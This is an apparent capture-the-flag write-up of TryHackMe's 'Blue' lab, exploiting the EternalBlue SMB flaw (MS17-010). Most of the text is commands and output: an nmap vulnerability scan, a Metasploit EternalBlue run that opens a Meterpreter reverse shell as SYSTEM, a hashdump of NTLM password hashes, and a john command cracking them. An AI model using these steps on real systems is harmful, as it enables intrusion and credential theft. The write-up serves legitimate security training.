TryHackMe Blue writeup

TryHackMe Blue writeup

Blue is the second machine in TryHackMe’s “Offensive pentesting” path.


Enumeration

We will start with nmap scan on the target:

nmap nmap -sV -vv --script vuln 10.10.221.153

PORT      STATE SERVICE            REASON  VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
49153/tcp open  msrpc              syn-ack Microsoft Windows RPC
49154/tcp open  msrpc              syn-ack Microsoft Windows RPC
49158/tcp open  msrpc              syn-ack Microsoft Windows RPC
49159/tcp open  msrpc              syn-ack Microsoft Windows RPC

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

This machine is vulnerable to the smb-vuln-ms17-010 exploit, known in media as EternalBlue.

It can be done without Metasploit, of course, but it will be time-consuming.

I’ll probably describe non-metasploit method next time.


Exploitation

Run Metasploit:

msfconsole

       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

Set up the exploit:

msf5 > use windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.62.28
RHOSTS => 10.10.62.28
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0

It should be fine as it is, but you also might need to change the LPORT too. Hit run:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.11.19.53:1337
[*] 10.10.62.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.62.28:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.28:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.62.28:445 - Connecting to target for exploitation.
[+] 10.10.62.28:445 - Connection established for exploitation.
[+] 10.10.62.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.62.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.62.28:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.62.28:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.62.28:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.62.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.62.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.62.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.62.28:445 - Starting non-paged pool grooming
[+] 10.10.62.28:445 - Sending SMBv2 buffers
[+] 10.10.62.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.62.28:445 - Sending final SMBv2 buffers.
[*] 10.10.62.28:445 - Sending last fragment of exploit packet!
[*] 10.10.62.28:445 - Receiving response from exploit packet
[+] 10.10.62.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.62.28:445 - Sending egg to corrupted connection.
[*] 10.10.62.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.62.28
[*] Meterpreter session 1 opened (10.11.19.53:1337 -> 10.10.62.28:49170) at 2020-10-08 10:25:32 -0400
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : JON-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

The process of migrating the shell is well described in the official material, but I didn’t have any issue with the shell as it is.


Post Exploitation

As the shell is already running as NT AUTHORITY\SYSTEM we don’t need to do a PrivEsc. However, you might collect some useful data from the compromised machine. Most OSCP lab machines have something juicy to find if you become a root. Don’t skip the enumeration! To grab users' hashes, we can use hashdump command:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

We have a hash now! Let’s crack it. Save the hash into the file (jon.hash in my case) and crack it with john:

/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt --format=NT ./jon.hash

Yay! We have Jon’s password now.


Capturing flags

Well, the exercise is explicitly asking you to submit flags, but don’t think of them as a CTF flag. A flag in a good CTF is located in a place where you can’t reach it without going the extra mile. There are three flags in this machine, and they are placed in quite sensitive places:

- C:/
- C:/Windows/System32/config/
- C:/Users/Jon/Documents

That makes sense. System32/config/ is the place where SAM files are located, Jon is the admin, so something helpful might be found in the Documents folder, etc.


Takeaway

  • Exploits rarely work fine out of the box. You might need a lot of patience to make it work sometimes.

  • Not all exploits (especially if we’re talking about kernel exploits) are stable. You might need to restart this box a bunch of times.

  • Metasploit doesn’t always mean that your exploitation phase will go smoothly.

  • The post exploitation phase is important.